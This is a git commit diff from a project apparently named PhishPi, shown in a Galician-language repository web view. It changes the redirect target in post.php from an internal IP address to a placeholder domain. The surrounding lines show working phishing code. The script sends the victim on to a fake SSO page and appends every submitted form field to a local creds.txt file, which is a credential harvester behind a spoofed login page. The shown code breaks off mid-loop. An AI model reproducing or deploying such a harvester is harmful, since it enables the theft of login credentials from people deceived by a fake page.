Explorar o código

Update post.php

assume-breach %!s(int64=3) %!d(string=hai) anos
pai
achega
5669785e88
Modificáronse 1 ficheiros con 1 adicións e 1 borrados
  1. 1 1
      PhishPi/Resources/post.php

+ 1 - 1
PhishPi/Resources/post.php

@@ -1,5 +1,5 @@
 <?php
-header ('Location:http://10.1.1.1/sso.html');
+header ('Location:http://domain/sso.html');
 $handle = fopen("creds.txt", "a");
 foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);